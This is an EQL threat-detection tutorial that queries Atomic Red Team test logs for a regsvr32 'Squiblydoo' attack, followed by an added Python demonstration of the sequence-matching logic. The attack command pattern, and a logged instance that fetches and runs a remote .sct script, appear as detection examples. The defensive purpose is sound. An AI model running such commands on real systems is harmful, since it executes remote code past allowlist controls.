Example: Detect threats with EQL
This example tutorial shows how you can use EQL to detect security threats and other suspicious behavior. In the scenario, you're tasked with detecting regsvr32 misuse in Windows event logs.
regsvr32.exe is a built-in command-line utility used to register .dll libraries in Windows. As a native tool, regsvr32.exe has a trusted status, letting it bypass most allowlist software and script blockers. Attackers with access to a user's command line can use regsvr32.exe to run malicious scripts via .dll libraries, even on machines that otherwise disallow such scripts.
One common variant of regsvr32 misuse is a Squiblydoo attack. In a Squiblydoo attack, a regsvr32.exe command uses the scrobj.dll library to register and run a remote script. These commands often look like this:
"regsvr32.exe /s /u /i:<script-url> scrobj.dll"
Setup
This tutorial uses a test dataset from Atomic Red Team that includes events imitating a Squiblydoo attack. The data has been mapped to Elastic Common Schema (ECS) fields.
To get started:
- Create an index template with a data stream enabled:
PUT /_index_template/my-data-stream-template
{
  "index_patterns": [ "my-data-stream*" ],
  "data_stream": { },
  "priority": 500
}
- Download normalized-T1117-AtomicRed-regsvr32.json.
- Use the bulk API to index the data into a matching stream:
curl -H "Content-Type: application/json" -XPOST "localhost:9200/my-data-stream/_bulk?pretty&refresh" --data-binary "@normalized-T1117-AtomicRed-regsvr32.json"
- Use the cat indices API to verify the data was indexed:
GET /_cat/indices/my-data-stream?v=true&h=health,status,index,docs.count
The response should show a docs.count of 150.
health status index                                docs.count
yellow open   .ds-my-data-stream-2099.12.07-000001 150
Get a count of regsvr32 events
First, get a count of events associated with a regsvr32.exe process:
GET /my-data-stream/_eql/search?filter_path=-hits.events
{
  "query": """
    any where process.name == "regsvr32.exe"
  """,
  "size": 200
}
The query clause any where process.name == "regsvr32.exe" matches any event with a process.name of regsvr32.exe. The "size": 200 parameter returns up to 200 hits for matching events.
The response returns 143 related events.
{
"is_partial": false,
"is_running": false,
"took": 60,
"timed_out": false,
"hits": {
"total": {
"value": 143,
"relation": "eq"
}
}
}
Check for command line artifacts
The regsvr32.exe processes are associated with 143 events. But how was regsvr32.exe first called? And who called it? regsvr32.exe is a command-line utility. Narrow your results to processes where the command line was used:
GET /my-data-stream/_eql/search
{
"query": """
process where process.name == "regsvr32.exe" and process.command_line.keyword != null
"""
}
The query matches one event with an event.type of creation, indicating the start of a regsvr32.exe process. Based on the event's process.command_line value, regsvr32.exe used scrobj.dll to register a script, RegSvr32.sct. This fits the behavior of a Squiblydoo attack.
{
...
"hits": {
"total": {
"value": 1,
"relation": "eq"
},
"events": [
{
"_index": ".ds-my-data-stream-2099.12.07-000001",
"_id": "gl5MJXMBMk1dGnErnBW8",
"_source": {
"process": {
"parent": {
"name": "cmd.exe",
"entity_id": "{42FC7E13-CBCB-5C05-0000-0010AA385401}",
"executable": "C:\\Windows\\System32\\cmd.exe"
},
"name": "regsvr32.exe",
"pid": 2012,
"entity_id": "{42FC7E13-CBCB-5C05-0000-0010A0395401}",
"command_line": "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll",
"executable": "C:\\Windows\\System32\\regsvr32.exe",
"ppid": 2652
},
"logon_id": 217055,
"@timestamp": 131883573237130000,
"event": {
"category": "process",
"type": "creation"
},
"user": {
"full_name": "bob",
"domain": "ART-DESKTOP",
"id": "ART-DESKTOP\\bob"
}
}
}
]
}
}
Check for malicious script loads
Check if regsvr32.exe subsequently loaded the scrobj.dll library:
GET /my-data-stream/_eql/search
{
"query": """
library where process.name == "regsvr32.exe" and dll.name == "scrobj.dll"
"""
}
The query matches an event, confirming scrobj.dll was loaded.
{
...
"hits": {
"total": {
"value": 1,
"relation": "eq"
},
"events": [
{
"_index": ".ds-my-data-stream-2099.12.07-000001",
"_id": "ol5MJXMBMk1dGnErnBW8",
"_source": {
"process": {
"name": "regsvr32.exe",
"pid": 2012,
"entity_id": "{42FC7E13-CBCB-5C05-0000-0010A0395401}",
"executable": "C:\\Windows\\System32\\regsvr32.exe"
},
"@timestamp": 131883573237450016,
"dll": {
"path": "C:\\Windows\\System32\\scrobj.dll",
"name": "scrobj.dll"
},
"event": {
"category": "library"
}
}
}
]
}
}
Determine the likelihood of success
In many cases, attackers use malicious scripts to connect to remote servers or download other files. Use an EQL sequence query to check for the following series of events:
- A regsvr32.exe process
- A load of the scrobj.dll library by the same process
- Any network event by the same process
Based on the command line value seen in the previous response, you can expect to find a match. However, the query isn't designed for that specific command. Instead, it looks for a pattern of suspicious behavior that's generic enough to detect similar threats.
GET /my-data-stream/_eql/search
{
"query": """
sequence by process.pid
[process where process.name == "regsvr32.exe"]
[library where dll.name == "scrobj.dll"]
[network where true]
"""
}
The query matches a sequence, indicating the attack likely succeeded.
{
...
"hits": {
"total": {
"value": 1,
"relation": "eq"
},
"sequences": [
{
"join_keys": [
2012
],
"events": [
{
"_index": ".ds-my-data-stream-2099.12.07-000001",
"_id": "gl5MJXMBMk1dGnErnBW8",
"_source": {
"process": {
"parent": {
"name": "cmd.exe",
"entity_id": "{42FC7E13-CBCB-5C05-0000-0010AA385401}",
"executable": "C:\\Windows\\System32\\cmd.exe"
},
"name": "regsvr32.exe",
"pid": 2012,
"entity_id": "{42FC7E13-CBCB-5C05-0000-0010A0395401}",
"command_line": "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll",
"executable": "C:\\Windows\\System32\\regsvr32.exe",
"ppid": 2652
},
"logon_id": 217055,
"@timestamp": 131883573237130000,
"event": {
"category": "process",
"type": "creation"
},
"user": {
"full_name": "bob",
"domain": "ART-DESKTOP",
"id": "ART-DESKTOP\\bob"
}
}
},
{
"_index": ".ds-my-data-stream-2099.12.07-000001",
"_id": "ol5MJXMBMk1dGnErnBW8",
"_source": {
"process": {
"name": "regsvr32.exe",
"pid": 2012,
"entity_id": "{42FC7E13-CBCB-5C05-0000-0010A0395401}",
"executable": "C:\\Windows\\System32\\regsvr32.exe"
},
"@timestamp": 131883573237450016,
"dll": {
"path": "C:\\Windows\\System32\\scrobj.dll",
"name": "scrobj.dll"
},
"event": {
"category": "library"
}
}
},
{
"_index": ".ds-my-data-stream-2099.12.07-000001",
"_id": "EF5MJXMBMk1dGnErnBa9",
"_source": {
"process": {
"name": "regsvr32.exe",
"pid": 2012,
"entity_id": "{42FC7E13-CBCB-5C05-0000-0010A0395401}",
"executable": "C:\\Windows\\System32\\regsvr32.exe"
},
"@timestamp": 131883573238680000,
"destination": {
"address": "151.101.48.133",
"port": "443"
},
"source": {
"address": "192.168.162.134",
"port": "50505"
},
"event": {
"category": "network"
},
"user": {
"full_name": "bob",
"domain": "ART-DESKTOP",
"id": "ART-DESKTOP\\bob"
},
"network": {
"protocol": "tcp",
"direction": "outbound"
}
}
}
]
}
]
}
}
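To make the join-by-pid logic of the sequence query concrete, here is an added Python re-implementation (not Elastic's code and not part of the tutorial's dataset) that runs the same three stages over a handful of constructed ECS-style events, including a benign regsvr32 run and an out-of-order case that must not match.

```python
from collections import defaultdict

# Constructed sample events (not from the tutorial's dataset), in ingest order.
# Only the ECS fields the sequence query needs are included.
EVENTS = [
    {"event": {"category": "process"}, "process": {"name": "regsvr32.exe", "pid": 2012}},
    {"event": {"category": "library"}, "process": {"name": "regsvr32.exe", "pid": 2012},
     "dll": {"name": "scrobj.dll"}},
    {"event": {"category": "network"}, "process": {"name": "regsvr32.exe", "pid": 2012}},
    # Benign use: regsvr32 registers an ordinary DLL; no scrobj.dll load, no network.
    {"event": {"category": "process"}, "process": {"name": "regsvr32.exe", "pid": 3100}},
    {"event": {"category": "library"}, "process": {"name": "regsvr32.exe", "pid": 3100},
     "dll": {"name": "vendor.dll"}},
    # Out of order: the network event precedes the scrobj.dll load, so pid 4200 must not match.
    {"event": {"category": "process"}, "process": {"name": "regsvr32.exe", "pid": 4200}},
    {"event": {"category": "network"}, "process": {"name": "regsvr32.exe", "pid": 4200}},
    {"event": {"category": "library"}, "process": {"name": "regsvr32.exe", "pid": 4200},
     "dll": {"name": "scrobj.dll"}},
]

# One predicate per EQL stage, mirroring the tutorial's sequence query.
STAGES = [
    lambda e: e["event"]["category"] == "process" and e["process"]["name"] == "regsvr32.exe",
    lambda e: e["event"]["category"] == "library" and e.get("dll", {}).get("name") == "scrobj.dll",
    lambda e: e["event"]["category"] == "network",
]

def match_sequence(events, stages, join_key=lambda e: e["process"]["pid"]):
    """Return completed sequences as (join_key, [matched events]) tuples.

    Each join key (here process.pid) tracks how many stages it has satisfied.
    An event advances a sequence only if it matches the *next* stage, so the
    stages must occur in order, as with EQL's `sequence by process.pid`.
    Events that match no stage are skipped rather than resetting progress.
    """
    progress = defaultdict(list)  # join key -> events matched so far
    completed = []
    for ev in events:
        key = join_key(ev)
        stage_idx = len(progress[key])
        if stage_idx < len(stages) and stages[stage_idx](ev):
            progress[key].append(ev)
            if len(progress[key]) == len(stages):
                completed.append((key, progress.pop(key)))
    return completed

if __name__ == "__main__":
    for pid, seq in match_sequence(EVENTS, STAGES):
        print(f"pid {pid}: {' -> '.join(e['event']['category'] for e in seq)}")
```

Only pid 2012 completes all three stages; the benign registration never loads scrobj.dll, and the out-of-order case shows why the network event has to follow the library load for the sequence to fire.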